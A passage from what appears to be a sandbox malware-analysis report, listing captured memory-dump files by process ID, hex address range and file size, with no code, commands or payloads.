                                                                                            Filesize

                                                                                            932KB

                                                                                          • memory/2872-178-0x0000000004790000-0x0000000004879000-memory.dmp

                                                                                            Filesize

                                                                                            932KB

                                                                                          • memory/2872-177-0x0000000004790000-0x000000000487E000-memory.dmp

                                                                                            Filesize

                                                                                            952KB

                                                                                          • memory/2872-199-0x0000000004790000-0x0000000004879000-memory.dmp

                                                                                            Filesize

                                                                                            932KB

                                                                                          • memory/2872-201-0x0000000004790000-0x0000000004879000-memory.dmp

                                                                                            Filesize

                                                                                            932KB

                                                                                          • memory/2904-1534-0x00000000060F0000-0x00000000065E9000-memory.dmp

                                                                                            Filesize

                                                                                            5.0MB

                                                                                          • memory/2904-1516-0x0000000006220000-0x00000000066CB000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/2904-1688-0x0000000006280000-0x0000000006726000-memory.dmp

                                                                                            Filesize

                                                                                            4.6MB

                                                                                          • memory/2904-1685-0x0000000006300000-0x0000000006B5A000-memory.dmp

                                                                                            Filesize

                                                                                            8.4MB

                                                                                          • memory/2904-1644-0x00000000062A0000-0x0000000006558000-memory.dmp

                                                                                            Filesize

                                                                                            2.7MB

                                                                                          • memory/2904-1635-0x00000000062A0000-0x0000000006558000-memory.dmp

                                                                                            Filesize

                                                                                            2.7MB

                                                                                          • memory/2904-1723-0x0000000005F30000-0x00000000063F1000-memory.dmp

                                                                                            Filesize

                                                                                            4.8MB

                                                                                          • memory/2904-1722-0x0000000005F30000-0x00000000063F1000-memory.dmp

                                                                                            Filesize

                                                                                            4.8MB

                                                                                          • memory/2904-1598-0x0000000006300000-0x0000000006B5A000-memory.dmp

                                                                                            Filesize

                                                                                            8.4MB

                                                                                          • memory/2904-1584-0x00000000060F0000-0x00000000065E9000-memory.dmp

                                                                                            Filesize

                                                                                            5.0MB

                                                                                          • memory/2904-1583-0x00000000060F0000-0x00000000065E9000-memory.dmp

                                                                                            Filesize

                                                                                            5.0MB

                                                                                          • memory/2904-1578-0x00000000062A0000-0x0000000006558000-memory.dmp

                                                                                            Filesize

                                                                                            2.7MB

                                                                                          • memory/2904-1579-0x00000000062A0000-0x0000000006558000-memory.dmp

                                                                                            Filesize

                                                                                            2.7MB

                                                                                          • memory/2904-18-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-19-0x0000000000B61000-0x0000000000B8F000-memory.dmp

                                                                                            Filesize

                                                                                            184KB

                                                                                          • memory/2904-20-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-1561-0x0000000006200000-0x0000000006676000-memory.dmp

                                                                                            Filesize

                                                                                            4.5MB

                                                                                          • memory/2904-23-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-22-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-39-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-42-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-56-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-62-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-1874-0x0000000006280000-0x0000000006726000-memory.dmp

                                                                                            Filesize

                                                                                            4.6MB

                                                                                          • memory/2904-1875-0x0000000006280000-0x0000000006726000-memory.dmp

                                                                                            Filesize

                                                                                            4.6MB

                                                                                          • memory/2904-154-0x0000000000B60000-0x0000000000E80000-memory.dmp

                                                                                            Filesize

                                                                                            3.1MB

                                                                                          • memory/2904-1453-0x0000000006220000-0x00000000066CB000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/2904-1454-0x0000000006220000-0x00000000066CB000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/2904-1507-0x0000000006200000-0x0000000006676000-memory.dmp

                                                                                            Filesize

                                                                                            4.5MB

                                                                                          • memory/2904-1533-0x00000000060F0000-0x00000000065E9000-memory.dmp

                                                                                            Filesize

                                                                                            5.0MB

                                                                                          • memory/2904-1911-0x0000000005F30000-0x00000000063F1000-memory.dmp

                                                                                            Filesize

                                                                                            4.8MB

                                                                                          • memory/2904-1912-0x0000000005F30000-0x00000000063F1000-memory.dmp

                                                                                            Filesize

                                                                                            4.8MB

                                                                                          • memory/2904-1515-0x0000000006220000-0x00000000066CB000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/2904-1686-0x0000000006280000-0x0000000006726000-memory.dmp

                                                                                            Filesize

                                                                                            4.6MB

                                                                                          • memory/2904-1508-0x0000000006200000-0x0000000006676000-memory.dmp

                                                                                            Filesize

                                                                                            4.5MB

                                                                                          • memory/2932-176-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                            Filesize

                                                                                            340KB

                                                                                          • memory/2932-165-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                            Filesize

                                                                                            340KB

                                                                                          • memory/2932-167-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                            Filesize

                                                                                            340KB

                                                                                          • memory/2932-174-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                            Filesize

                                                                                            340KB

                                                                                          • memory/2932-173-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2932-171-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                            Filesize

                                                                                            340KB

                                                                                          • memory/2932-163-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                            Filesize

                                                                                            340KB

                                                                                          • memory/2932-169-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                            Filesize

                                                                                            340KB

                                                                                          • memory/3380-1689-0x00000000012F0000-0x0000000001796000-memory.dmp

                                                                                            Filesize

                                                                                            4.6MB

                                                                                          • memory/3380-1715-0x00000000012F0000-0x0000000001796000-memory.dmp

                                                                                            Filesize

                                                                                            4.6MB

                                                                                          • memory/5668-2011-0x000000001B280000-0x000000001B562000-memory.dmp

                                                                                            Filesize

                                                                                            2.9MB

                                                                                          • memory/5668-2012-0x00000000025C0000-0x00000000025C8000-memory.dmp

                                                                                            Filesize

                                                                                            32KB

                                                                                          • memory/5884-2042-0x0000000000930000-0x0000000000C58000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/6072-1878-0x0000000000600000-0x0000000000618000-memory.dmp

                                                                                            Filesize

                                                                                            96KB

                                                                                          • memory/6072-1876-0x00000000005E0000-0x00000000005F8000-memory.dmp

                                                                                            Filesize

                                                                                            96KB

                                                                                          • memory/6072-1870-0x0000000000130000-0x00000000001C6000-memory.dmp

                                                                                            Filesize

                                                                                            600KB

                                                                                          • memory/6072-1871-0x00000000005A0000-0x00000000005D6000-memory.dmp

                                                                                            Filesize

                                                                                            216KB

                                                                                          • memory/6072-1872-0x0000000001FF0000-0x000000000207C000-memory.dmp

                                                                                            Filesize

                                                                                            560KB

                                                                                          • memory/6072-1873-0x000000001B3D0000-0x000000001B57A000-memory.dmp

                                                                                            Filesize

                                                                                            1.7MB

                                                                                          • memory/6192-1545-0x0000000001040000-0x0000000001539000-memory.dmp

                                                                                            Filesize

                                                                                            5.0MB

                                                                                          • memory/6192-1535-0x0000000001040000-0x0000000001539000-memory.dmp

                                                                                            Filesize

                                                                                            5.0MB

                                                                                          • memory/6244-2005-0x0000000000610000-0x00000000006D2000-memory.dmp

                                                                                            Filesize

                                                                                            776KB

                                                                                          • memory/6244-1809-0x00000000005B0000-0x00000000005D6000-memory.dmp

                                                                                            Filesize

                                                                                            152KB

                                                                                          • memory/6244-1642-0x00000000001A0000-0x00000000002B6000-memory.dmp

                                                                                            Filesize

                                                                                            1.1MB

                                                                                          • memory/6612-1867-0x0000000000820000-0x000000000082C000-memory.dmp

                                                                                            Filesize

                                                                                            48KB

                                                                                          • memory/6660-4137-0x0000000000550000-0x000000000057C000-memory.dmp

                                                                                            Filesize

                                                                                            176KB

                                                                                          • memory/6660-2061-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                            Filesize

                                                                                            400KB

                                                                                          • memory/6660-2066-0x0000000000700000-0x0000000000798000-memory.dmp

                                                                                            Filesize

                                                                                            608KB

                                                                                          • memory/6940-1512-0x0000000000880000-0x0000000000D2B000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/6940-1456-0x0000000000880000-0x0000000000D2B000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB